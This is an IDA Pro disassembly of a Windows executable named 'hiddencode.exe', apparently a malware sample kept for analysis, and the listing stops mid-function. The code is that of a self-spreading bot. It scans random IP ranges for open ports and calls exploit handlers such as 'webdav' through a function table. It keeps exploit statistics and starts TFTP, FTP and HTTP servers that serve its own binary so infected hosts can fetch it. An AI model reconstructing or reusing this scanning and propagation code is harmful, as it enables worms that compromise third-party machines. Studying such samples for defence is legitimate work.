Assembly Code of File 0a9bea275061008f929aad3c0cdeaefc/0a9bea275061008f929aad3c0cdeaefc_unpacked.asm
;
; + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
;
;
; + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
;
; Input MD5 : 0A9BEA275061008F929AAD3C0CDEAEFC
; File Name : u:\startupscripts\work\hiddencode.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0001D8C4 ( 121028.)
; Section size in file : 0001D8C4 ( 121028.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,
db '&c', page
endm
ifnb
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
########################## SUBROUTINE ##########################
sub_401000 proc near ; CODE XREF: sub_4078FA + 4834�p
var_400 = byte ptr - 400h
var_200 = byte ptr - 200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ ebp + var_200 ]
push offset aScanExploitSta ; \"[ SCAN ]: Exploit Statistics:\"
push eax
xor ebx, ebx
call sub_412BB5
cmp dword_42A068, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40106E
push esi
mov esi, offset dword_42A070
loc_401033: ; CODE XREF: sub_401000 + 6B�j
mov eax, [ esi ]
push eax
add ebx, eax
lea eax, [ esi - 26h ]
push eax
lea eax, [ ebp + var_400 ]
push offset aSD ; \" %s: %d,\"
push eax
call sub_412BB5
push edi
lea eax, [ ebp + var_400 ]
push eax
lea eax, [ ebp + var_200 ]
push eax
call sub_412A80
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [ esi - 8 ], 0
jnz short loc_401033
pop esi
loc_40106E: ; CODE XREF: sub_401000 + 2B�j
push dword_479BB0
call sub_40FD16
push eax
push ebx
lea eax, [ ebp + var_400 ]
push offset aTotalDInS_ ; \" Total: %d in %s.\"
push eax
call sub_412BB5
push edi
lea eax, [ ebp + var_400 ]
push eax
lea eax, [ ebp + var_200 ]
push eax
call sub_412A80
push 0
push [ ebp + arg_8 ]
lea eax, [ ebp + var_200 ]
push eax
push [ ebp + arg_4 ]
push [ ebp + arg_0 ]
call sub_4045DD
lea eax, [ ebp + var_200 ]
push eax
call sub_401C33
add esp, 38h
pop edi
pop ebx
leave
retn
sub_401000 endp
########################## SUBROUTINE ##########################
sub_4010CA proc near ; CODE XREF: sub_4078FA + 4154�p
var_200 = byte ptr - 200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 9
call sub_4110DA
test eax, eax
pop ecx
jle short loc_401106
mov eax, [ ebp + arg_C ]
push dword_42D700[ eax * 8 ]
call dword_433520 ; inet_ntoa
push eax
lea eax, [ ebp + var_200 ]
push offset aScanCurrentIpS ; \"[ SCAN ]: Current IP: %s.\"
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_401119
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_401106: ; CODE XREF: sub_4010CA + 13�j
lea eax, [ ebp + var_200 ]
push offset aScanScanNotAct ; \"[ SCAN ]: Scan not active.\"
push eax
call sub_412BB5
pop ecx
pop ecx
loc_401119: ; CODE XREF: sub_4010CA + 3A�j
push 0
push [ ebp + arg_8 ]
lea eax, [ ebp + var_200 ]
push eax
push [ ebp + arg_4 ]
push [ ebp + arg_0 ]
call sub_4045DD
lea eax, [ ebp + var_200 ]
push eax
call sub_401C33
add esp, 18h
leave
retn
sub_4010CA endp
########################## SUBROUTINE ##########################
sub_401141 proc near ; CODE XREF: sub_4018D1 + 52�p
var_204 = byte ptr - 204h
var_4 = byte ptr - 4
arg_94 = byte ptr 9Ch
arg_114 = byte ptr 11Ch
arg_194 = dword ptr 19Ch
arg_1B4 = dword ptr 1BCh
arg_1BC = dword ptr 1C4h
arg_1C0 = dword ptr 1C8h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ ebp + arg_1B4 ]
cmp eax, 0FFFFFFFFh
jz locret_4014F1
imul eax, 3Ch
push ebx
xor ebx, ebx
cmp dword_42A074[ eax ], ebx
push esi
jz loc_4013DF
push 5
call sub_4110DA
test eax, eax
pop ecx
jnz loc_4014EF
mov eax, dword_42AE44
push edi
push 104h
mov edi, offset dword_42ED14
push edi
push ebx
mov dword_42EF24, eax
mov dword_42EF20, ebx
call ds:dword_41F010 ; GetModuleFileNameA
push 103h
push offset byte_42AED0
mov esi, offset dword_42EE18
push esi
call sub_412C40
mov eax, [ ebp + arg_194 ]
add esp, 0Ch
cmp [ ebp + arg_114 ], bl
mov dword_42ED10, eax
mov eax, [ ebp + arg_1BC ]
mov dword_42EFA8, eax
push 7Fh
jnz short loc_4011F4
lea eax, [ ebp + arg_94 ]
push eax
push offset dword_42EF28
call sub_412C40
mov dword_42EFAC, 1
jmp short loc_40120B
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4011F4: ; CODE XREF: sub_401141 + 94�j
lea eax, [ ebp + arg_114 ]
push eax
push offset dword_42EF28
call sub_412C40
mov dword_42EFAC, ebx
loc_40120B: ; CODE XREF: sub_401141 + B1�j
add esp, 0Ch
push esi
push edi
push dword_42EF24
lea eax, [ ebp + var_204 ]
push offset aTftpServerStar ; \"[ TFTP ]: Server started on Port: %d, Fil\"...
push eax
call sub_412BB5
push ebx
lea eax, [ ebp + var_204 ]
push 5
push eax
call sub_410EEA
add esp, 20h
mov dword_42EF1C, eax
lea eax, [ ebp + var_4 ]
push eax
push ebx
push offset dword_42ED10
push offset sub_410A22
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, dword_42EF1C
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ ecx ], eax
jnz loc_401327
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ ebp + var_204 ]
push offset aTftpFailedToSt ; \"[ TFTP ]: Failed to start server, error: \"...
push eax
call sub_412BB5
add esp, 0Ch
loc_40128A: ; CODE XREF: sub_401141 + 1EE�j
lea eax, [ ebp + var_204 ]
push eax
call sub_401C33
pop ecx
call ds:dword_41F004 ; GetTickCount
xor edx, edx
mov ecx, 0F82Fh
div ecx
push 104h
mov edi, offset dword_42EA6C
push edi
push ebx
mov dword_42EC78, ebx
add edx, 400h
mov dword_42EC7C, edx
call ds:dword_41F010 ; GetModuleFileNameA
push 103h
push offset byte_42AED0
mov esi, offset dword_42EB70
push esi
call sub_412C40
mov eax, [ ebp + arg_194 ]
add esp, 0Ch
cmp [ ebp + arg_114 ], bl
mov dword_42EA68, eax
mov eax, [ ebp + arg_1BC ]
mov dword_42ED00, eax
push 7Fh
jnz short loc_401334
lea eax, [ ebp + arg_94 ]
push eax
push offset dword_42EC80
call sub_412C40
mov dword_42ED04, 1
jmp short loc_40134B
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_40131F: ; CODE XREF: sub_401141 + 1EC�j
push 32h
call ds:dword_41F000 ; Sleep
loc_401327: ; CODE XREF: sub_401141 + 128�j
cmp dword_42EFB0, ebx
jz short loc_40131F
jmp loc_40128A
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_401334: ; CODE XREF: sub_401141 + 1BF�j
lea eax, [ ebp + arg_114 ]
push eax
push offset dword_42EC80
call sub_412C40
mov dword_42ED04, ebx
loc_40134B: ; CODE XREF: sub_401141 + 1DC�j
add esp, 0Ch
push esi
push edi
push dword_42EC7C
push dword_42EA68
call sub_406C33
pop ecx
push eax
lea eax, [ ebp + var_204 ]
push offset aFtpServerStart ; \"[ FTP ]: Server started on: %s:%d, File: \"...
push eax
call sub_412BB5
push ebx
lea eax, [ ebp + var_204 ]
push 6
push eax
call sub_410EEA
add esp, 24h
mov dword_42EC74, eax
lea eax, [ ebp + var_4 ]
push eax
push ebx
push offset dword_42EA68
push offset sub_402B1D
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, dword_42EC74
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ ecx ], eax
pop edi
jnz short loc_4013D2
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aFtpFailedToSta ; \"[ FTP ]: Failed to start server, error: <\"...
jmp loc_4014D3
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4013CA: ; CODE XREF: sub_401141 + 297�j
push 32h
call ds:dword_41F000 ; Sleep
loc_4013D2: ; CODE XREF: sub_401141 + 276�j
cmp dword_42ED08, ebx
jz short loc_4013CA
jmp loc_4014E2
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4013DF: ; CODE XREF: sub_401141 + 25�j
cmp dword_42A078[ eax ], ebx
jz loc_4014EF
push 4
call sub_4110DA
test eax, eax
pop ecx
jnz loc_4014EF
push 104h
mov esi, offset dword_42E944
push esi
push ebx
call ds:dword_41F010 ; GetModuleFileNameA
push 5Ch
push esi
call sub_412C10
cmp eax, ebx
pop ecx
pop ecx
jz short loc_40141D
mov [ eax ], bl
loc_40141D: ; CODE XREF: sub_401141 + 2D8�j
mov eax, dword_42AE48
mov dword_42EA48, eax
lea eax, [ ebp + arg_94 ]
push eax
push offset dword_42E6BC
mov dword_42EA5C, ebx
call sub_412BB5
mov eax, [ ebp + arg_194 ]
pop ecx
pop ecx
mov ecx, [ ebp + arg_1BC ]
push esi
push dword_42EA48
mov dword_42EA54, ecx
mov ecx, [ ebp + arg_1C0 ]
push eax
mov dword_42E6B8, eax
mov dword_42EA58, ecx
call sub_406C33
pop ecx
push eax
lea eax, [ ebp + var_204 ]
push offset aHttpdServerLis ; \"[ HTTPD ]: Server listening on IP: %s:%d,\"...
push eax
call sub_412BB5
push ebx
lea eax, [ ebp + var_204 ]
push 4
push eax
call sub_410EEA
add esp, 20h
loc_401495: ; DATA XREF: .data:off_42BB98�o
; .data:off_42C450�o
mov dword_42EA50, eax
lea eax, [ ebp + var_4 ]
push eax
push ebx
push offset dword_42E6B8
push offset sub_403E06
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, dword_42EA50
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ ecx ], eax
jnz short loc_4014FB
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aHttpdFailedToS ; \"[ HTTPD ]: Failed to start server, error:\"...
loc_4014D3: ; CODE XREF: sub_401141 + 284�j
lea eax, [ ebp + var_204 ]
push eax
call sub_412BB5
add esp, 0Ch
loc_4014E2: ; CODE XREF: sub_401141 + 299�j
; sub_401141 + 3C2�j
lea eax, [ ebp + var_204 ]
push eax
call sub_401C33
pop ecx
loc_4014EF: ; CODE XREF: sub_401141 + 35�j
; sub_401141 + 2A4�j ...
pop esi
pop ebx
locret_4014F1: ; CODE XREF: sub_401141 + 12�j
leave
retn
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4014F3: ; CODE XREF: sub_401141 + 3C0�j
push 32h
call ds:dword_41F000 ; Sleep
loc_4014FB: ; CODE XREF: sub_401141 + 384�j
cmp dword_42EA64, ebx
jz short loc_4014F3
jmp short loc_4014E2
sub_401141 endp
########################## SUBROUTINE ##########################
sub_401505 proc near ; CODE XREF: sub_40169B:loc_4016FD�p
arg_0 = dword ptr 4
push esi
mov esi, [ esp + 4 + arg_0 ]
lea esi, ds:42D700h[ esi * 8 ]
push dword ptr [ esi ]
call dword_433570 ; ntohl
inc eax
push eax
call dword_4335C4 ; ntohl
mov [ esi ], eax
pop esi
retn
sub_401505 endp
########################## SUBROUTINE ##########################
sub_401525 proc near ; CODE XREF: sub_40169B + 5A�p
var_10 = dword ptr - 10h
var_C = dword ptr - 0Ch
var_8 = dword ptr - 8
var_4 = dword ptr - 4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ ebp + arg_0 ]
push edi
or edi, 0FFFFFFFFh
mov [ ebp + var_4 ], edi
mov [ ebp + var_C ], edi
mov [ ebp + var_8 ], edi
mov [ ebp + var_10 ], edi
lea ecx, [ eax + 1 ]
loc_401541: ; CODE XREF: sub_401525 + 21�j
mov dl, [ eax ]
inc eax
test dl, dl
jnz short loc_401541
sub eax, ecx
cmp eax, 0Fh
jbe short loc_401556
xor eax, eax
jmp loc_4015FB
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_401556: ; CODE XREF: sub_401525 + 28�j
push esi
lea eax, [ ebp + var_10 ]
push eax
lea eax, [ ebp + var_8 ]
push eax
lea eax, [ ebp + var_C ]
push eax
lea eax, [ ebp + var_4 ]
push eax
push offset aD_D_D_D ; \"%d.%d.%d.%d\"
push [ ebp + arg_0 ]
call sub_412D93
add esp, 18h
cmp [ ebp + var_4 ], edi
jnz short loc_4015A0
call sub_412D71
mov esi, 0FFh
jmp short loc_40158D
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_401588: ; CODE XREF: sub_401525 + 79�j
call sub_412D71
loc_40158D: ; CODE XREF: sub_401525 + 61�j
cdq
mov ecx, esi
idiv ecx
push edx
mov [ ebp + var_4 ], edx
call sub_41013C
test al, al
pop ecx
jnz short loc_401588
loc_4015A0: ; CODE XREF: sub_401525 + 55�j
cmp [ ebp + var_C ], edi
mov esi, 100h
jnz short loc_4015B7
call sub_412D71
cdq
mov ecx, esi
idiv ecx
mov [ ebp + var_C ], edx
loc_4015B7: ; CODE XREF: sub_401525 + 83�j
cmp [ ebp + var_8 ], edi
jnz short loc_4015C7
call sub_412D71
cdq
idiv esi
mov [ ebp + var_8 ], edx
loc_4015C7: ; CODE XREF: sub_401525 + 95�j
mov edx, [ ebp + var_10 ]
cmp edx, edi
pop esi
jnz short loc_4015DD
call sub_412D71
cdq
mov ecx, 0FEh
idiv ecx
inc edx
loc_4015DD: ; CODE XREF: sub_401525 + A8�j
mov eax, [ ebp + var_4 ]
mov ecx, [ ebp + arg_4 ]
shl edx, 8
add edx, [ ebp + var_8 ]
shl edx, 8
add edx, [ ebp + var_C ]
shl edx, 8
add eax, edx
mov dword_42D700[ ecx * 8 ], eax
loc_4015FB: ; CODE XREF: sub_401525 + 2C�j
pop edi
leave
retn
sub_401525 endp
########################## SUBROUTINE ##########################
sub_4015FE proc near ; CODE XREF: sub_40169B + A9�p
; sub_4028A8 + 2C�p
var_120 = dword ptr - 120h
var_11C = dword ptr - 11Ch
var_1C = word ptr - 1Ch
var_1A = word ptr - 1Ah
var_18 = dword ptr - 18h
var_C = dword ptr - 0Ch
var_8 = dword ptr - 8
var_4 = dword ptr - 4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
push ebx
inc edi
push edi
push 2
mov [ ebp + var_4 ], edi
call dword_4334A0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_401627
xor eax, eax
jmp short loc_401696
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_401627: ; CODE XREF: sub_4015FE + 23�j
mov eax, [ ebp + arg_0 ]
push [ ebp + arg_4 ]
mov [ ebp + var_1C ], 2
mov [ ebp + var_18 ], eax
call dword_4335EC ; ntohs
mov [ ebp + var_1A ], ax
lea eax, [ ebp + var_4 ]
push eax
push 8004667Eh
push esi
call dword_433444 ; ioctlsocket
push 10h
lea eax, [ ebp + var_1C ]
push eax
push esi
call dword_433458 ; connect
mov eax, [ ebp + arg_8 ]
mov [ ebp + var_C ], eax
lea eax, [ ebp + var_C ]
push eax
push ebx
lea eax, [ ebp + var_120 ]
push eax
push ebx
push ebx
mov [ ebp + var_8 ], ebx
mov [ ebp + var_11C ], esi
mov [ ebp + var_120 ], edi
call dword_433544 ; select
push esi
mov edi, eax
call dword_4335AC ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_401696: ; CODE XREF: sub_4015FE + 27�j
pop edi
pop esi
pop ebx
leave
retn
sub_4015FE endp
########################## SUBROUTINE ##########################
sub_40169B proc near ; DATA XREF: sub_4018D1 + 144�o
var_3B0 = dword ptr - 3B0h
var_394 = dword ptr - 394h
var_390 = byte ptr - 390h
var_380 = byte ptr - 380h
var_300 = dword ptr - 300h
var_2FC = byte ptr - 2FCh
var_27C = byte ptr - 27Ch
var_270 = dword ptr - 270h
var_26C = dword ptr - 26Ch
var_268 = dword ptr - 268h
var_260 = dword ptr - 260h
var_25C = dword ptr - 25Ch
var_254 = byte ptr - 254h
var_1D4 = byte ptr - 1D4h
var_1C4 = byte ptr - 1C4h
var_144 = dword ptr - 144h
var_140 = byte ptr - 140h
var_C0 = byte ptr - 0C0h
var_40 = dword ptr - 40h
var_3C = dword ptr - 3Ch
var_38 = dword ptr - 38h
var_2C = dword ptr - 2Ch
var_28 = dword ptr - 28h
var_20 = dword ptr - 20h
var_18 = dword ptr - 18h
var_14 = dword ptr - 14h
var_10 = dword ptr - 10h
var_4 = dword ptr - 4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ ebp + arg_0 ]
push ebx
push esi
push edi
push 74h
mov esi, eax
pop ecx
lea edi, [ ebp + var_1D4 ]
rep movsd
mov edi, [ ebp + var_2C ]
mov dword ptr [ eax + 1CCh ], 1
mov eax, [ ebp + var_28 ]
mov [ ebp + var_4 ], edi
mov [ ebp + arg_0 ], eax
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
mov ebx, edi
pop ecx
imul ebx, 234h
jmp loc_4018AD
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4016E7: ; CODE XREF: sub_40169B + 220�j
cmp [ ebp + var_10 ], 0
push eax
jz short loc_4016FD
lea eax, [ ebp + var_1D4 ]
push eax
call sub_401525
pop ecx
jmp short loc_401702
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4016FD: ; CODE XREF: sub_40169B + 51�j
call sub_401505
loc_401702: ; CODE XREF: sub_40169B + 60�j
pop ecx
push [ ebp + arg_0 ]
mov esi, eax
push dword_43433C[ ebx ]
push [ ebp + var_3C ]
push esi
call dword_433520 ; inet_ntoa
push eax
lea eax, [ ebp + var_254 ]
push offset aScanIpSDScanTh ; \"[ SCAN ]: IP: %s:%d, Scan thread: %d, Sub\"...
push eax
call sub_412BB5
lea eax, [ ebp + var_254 ]
push eax
lea eax, dword_434138[ ebx ]
push eax
call sub_412BB5
push [ ebp + var_38 ]
push [ ebp + var_3C ]
push esi
call sub_4015FE
add esp, 2Ch
cmp eax, 1
jnz loc_4018A2
cmp [ ebp + var_20 ], 0FFFFFFFFh
jnz short loc_4017D6
push offset dword_42E6A0
call ds:dword_41F01C ; RtlEnterCriticalSection
push [ ebp + var_3C ]
push esi
call dword_433520 ; inet_ntoa
push eax
lea eax, [ ebp + var_254 ]
push offset aScanIpSPortDIs ; \"[ SCAN ]: IP: %s, Port %d is open.\"
push eax
call sub_412BB5
add esp, 10h
cmp [ ebp + var_14 ], 0
jnz short loc_4017B8
cmp [ ebp + var_C0 ], 0
push 1
push [ ebp + var_18 ]
lea eax, [ ebp + var_254 ]
push eax
lea eax, [ ebp + var_C0 ]
jnz short loc_4017AC
lea eax, [ ebp + var_140 ]
loc_4017AC: ; CODE XREF: sub_40169B + 109�j
push eax
push [ ebp + var_40 ]
call sub_4045DD
add esp, 14h
loc_4017B8: ; CODE XREF: sub_40169B + EE�j
lea eax, [ ebp + var_254 ]
push eax
call sub_401C33
mov [ esp + 3B0h + var_3B0 ], offset dword_42E6A0
call ds:dword_41F018 ; RtlLeaveCriticalSection
jmp loc_4018A2
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4017D6: ; CODE XREF: sub_40169B + BE�j
push esi
call dword_433520 ; inet_ntoa
push eax
lea eax, [ ebp + var_390 ]
push eax
call sub_412BB5
mov eax, [ ebp + var_20 ]
imul eax, 3Ch
add eax, offset aWebdav ; \"webdav\"
push eax
lea eax, [ ebp + var_27C ]
push eax
call sub_412BB5
add esp, 10h
cmp [ ebp + var_C0 ], 0
lea eax, [ ebp + var_C0 ]
jnz short loc_40181A
lea eax, [ ebp + var_140 ]
loc_40181A: ; CODE XREF: sub_40169B + 177�j
push eax
lea eax, [ ebp + var_2FC ]
push eax
call sub_412BB5
mov eax, [ ebp + var_144 ]
pop ecx
mov [ ebp + var_300 ], eax
pop ecx
xor eax, eax
loc_401837: ; CODE XREF: sub_40169B + 1AD�j
mov cl, [ ebp + eax + var_1C4 ]
mov [ ebp + eax + var_380 ], cl
inc eax
test cl, cl
jnz short loc_401837
mov eax, [ ebp + var_40 ]
mov [ ebp + var_394 ], eax
mov eax, [ ebp + var_18 ]
mov [ ebp + var_260 ], eax
mov eax, [ ebp + var_14 ]
mov [ ebp + var_25C ], eax
mov eax, [ ebp + var_3C ]
mov [ ebp + var_270 ], eax
mov eax, [ ebp + var_20 ]
mov [ ebp + var_268 ], eax
imul eax, 3Ch
sub esp, 140h
push 50h
pop ecx
mov [ ebp + var_26C ], edi
lea esi, [ ebp + var_394 ]
mov edi, esp
rep movsd
call off_42A06C[ eax ]
mov edi, [ ebp + var_4 ]
add esp, 140h
loc_4018A2: ; CODE XREF: sub_40169B + B4�j
; sub_40169B + 136�j
push 7D0h
call ds:dword_41F000 ; Sleep
loc_4018AD: ; CODE XREF: sub_40169B + 47�j
mov eax, dword_43433C[ ebx ]
cmp dword_42D704[ eax * 8 ], 0
jnz loc_4016E7
push edi
call sub_4111AE
pop ecx
push 0
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40169B endp ; sp - analysis failed
########################## SUBROUTINE ##########################
sub_4018D1 proc near ; DATA XREF: sub_4078FA + 3C68�o
; sub_4078FA + 5643�o
var_304 = dword ptr - 304h
var_250 = byte ptr - 250h
var_1C0 = dword ptr - 1C0h
var_1BC = byte ptr - 1BCh
var_BC = dword ptr - 0BCh
var_B8 = dword ptr - 0B8h
var_B0 = dword ptr - 0B0h
var_AC = dword ptr - 0ACh
var_A8 = dword ptr - 0A8h
var_A4 = dword ptr - 0A4h
var_A0 = dword ptr - 0A0h
var_94 = dword ptr - 94h
var_90 = dword ptr - 90h
var_84 = dword ptr - 84h
var_80 = byte ptr - 80h
arg_0 = dword ptr 8
push ebp
lea ebp, [ esp - 74h ]
sub esp, 250h
mov eax, [ ebp + 74h + arg_0 ]
push ebx
push esi
push edi
push 74h
pop ecx
mov esi, eax
lea edi, [ ebp + 74h + var_250 ]
rep movsd
mov dword ptr [ eax + 1C8h ], 1
lea eax, [ ebp + 74h + var_250 ]
push eax
call dword_433514 ; inet_addr
mov ecx, [ ebp + 74h + var_AC ]
sub esp, 1D0h
mov dword_42D700[ ecx * 8 ], eax
push 74h
pop ecx
lea esi, [ ebp + 74h + var_250 ]
mov edi, esp
rep movsd
call sub_401141
xor ebx, ebx
add esp, 1D0h
cmp [ ebp + 74h + var_1C0 ], ebx
jnz short loc_401943
mov eax, dword_432FF4
mov [ ebp + 74h + var_1C0 ], eax
loc_401943: ; CODE XREF: sub_4018D1 + 65�j
push 9
call sub_4110DA
xor edi, edi
inc edi
cmp eax, edi
pop ecx
jnz short loc_4019B3
mov esi, offset dword_42E6A0
push esi
call ds:dword_41F024 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_41F020 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_4019B3
lea eax, [ ebp + 74h + var_80 ]
push offset aScanFailedToIn ; \"[ SCAN ]: Failed to initialize critical s\"...
push eax
call sub_412BB5
cmp [ ebp + 74h + var_90 ], ebx
pop ecx
pop ecx
jnz short loc_40199D
push ebx
push [ ebp + 74h + var_94 ]
lea eax, [ ebp + 74h + var_80 ]
push eax
lea eax, [ ebp + 74h + var_1BC ]
push eax
push [ ebp + 74h + var_BC ]
call sub_4045DD
add esp, 14h
loc_40199D: ; CODE XREF: sub_4018D1 + B0�j
lea eax, [ ebp + 74h + var_80 ]
push eax
call sub_401C33
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
add ebp, 74h
leave
retn 4
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4019B3: ; CODE XREF: sub_4018D1 + 7F�j
; sub_4018D1 + 9B�j
cmp [ ebp + 74h + var_A0 ], edi
mov eax, [ ebp + 74h + var_AC ]
mov esi, ds:dword_41F000
mov dword_42D704[ eax * 8 ], edi
jb loc_401A64
loc_4019CC: ; CODE XREF: sub_4018D1 + 18D�j
push edi
push [ ebp + 74h + var_AC ]
lea eax, [ ebp + 74h + var_250 ]
push [ ebp + 74h + var_B8 ]
mov [ ebp + 74h + var_A4 ], edi
push eax
lea eax, [ ebp + 74h + var_80 ]
push offset aScanSDScanThre ; \"[ SCAN ]: %s:%d, Scan thread: %d, Sub - thr\"...
push eax
call sub_412BB5
push ebx
lea eax, [ ebp + 74h + var_80 ]
push 9
push eax
call sub_410EEA
mov ecx, [ ebp + 74h + var_AC ]
mov [ ebp + 74h + var_A8 ], eax
imul eax, 234h
add esp, 24h
push ebx
push ebx
mov dword_43433C[ eax ], ecx
lea eax, [ ebp + 74h + var_250 ]
push eax
push offset sub_40169B
push ebx
push ebx
call ds:dword_41F00C ; CreateThread
mov ecx, [ ebp + 74h + var_A8 ]
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ ecx ], eax
jnz short loc_401A7B
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ ebp + 74h + var_80 ]
push offset aScanFailedToSt ; \"[ SCAN ]: Failed to start worker thread, \"...
push eax
call sub_412BB5
lea eax, [ ebp + 74h + var_80 ]
push eax
call sub_401C33
add esp, 10h
loc_401A56: ; CODE XREF: sub_4018D1 + 1AF�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ ebp + 74h + var_A0 ]
jbe loc_4019CC
loc_401A64: ; CODE XREF: sub_4018D1 + F5�j
cmp [ ebp + 74h + var_B0 ], ebx
jz short loc_401A89
mov eax, [ ebp + 74h + var_B0 ]
imul eax, 0EA60h
push eax
call esi ; Sleep
jmp short loc_401A96
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_401A77: ; CODE XREF: sub_4018D1 + 1AD�j
push 1Eh
call esi ; Sleep
loc_401A7B: ; CODE XREF: sub_4018D1 + 162�j
cmp [ ebp + 74h + var_84 ], ebx
jz short loc_401A77
jmp short loc_401A56
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_401A82: ; CODE XREF: sub_4018D1 + 1C3�j
push 7D0h
call esi ; Sleep
loc_401A89: ; CODE XREF: sub_4018D1 + 196�j
mov eax, [ ebp + 74h + var_AC ]
cmp dword_42D704[ eax * 8 ], 1
jz short loc_401A82
loc_401A96: ; CODE XREF: sub_4018D1 + 1A4�j
push [ ebp + 74h + var_B0 ]
mov eax, [ ebp + 74h + var_AC ]
push [ ebp + 74h + var_B8 ]
mov eax, dword_42D700[ eax * 8 ]
push eax
call dword_433520 ; inet_ntoa
push eax
lea eax, [ ebp + 74h + var_80 ]
push offset aScanFinishedAt ; \"[ SCAN ]: Finished at %s:%d after %d minu\"...
push eax
call sub_412BB5
add esp, 14h
cmp [ ebp + 74h + var_90 ], ebx
